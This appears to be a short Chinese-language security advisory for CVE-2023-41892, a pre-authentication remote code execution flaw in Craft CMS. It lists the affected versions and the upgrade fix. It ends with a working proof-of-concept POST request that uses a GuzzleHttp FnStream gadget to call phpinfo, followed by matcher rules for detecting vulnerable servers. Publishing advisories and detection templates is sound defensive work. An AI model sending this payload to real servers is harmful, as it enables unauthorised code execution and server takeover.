1.漏洞編號:CVE-2023-41892

2.危險等級:高危

3.漏洞概述:

  CraftCMS是一個靈活的、易于使用的內容管理系統。

4.漏洞類型:遠程代碼執行

影響:執行任意代碼

簡述:Craft CMS存在遠程代碼執行漏洞,未授權攻擊者可構造惡意請求執行任意代碼,進而控制服務器。

5.影響版本:

Craft CMS>=4.0.0-RC1, Craft CMS <= 4.4.14

6.安全版本:

Craft CMS 4.4.15

7.修復建議:

目前官方已發布漏洞修復版本,建議用戶升級到安全版本:

https://craftcms.com

POST /index.php HTTP/1.1請求頭:Host: {{Hostname}}Content-Type: application/x-www-form-urlencoded請求體:action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}此外,還有一個匹配條件和匹配器:匹配條件:必須同時滿足以下所有詞匯匹配器:不區分大小寫如果HTTP響應中包含"PHP Credits"、"PHP Group"和"CraftCMS"這些詞匯,且不區分大小寫,則條件滿足。
遠程代碼執行漏洞 漏洞
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接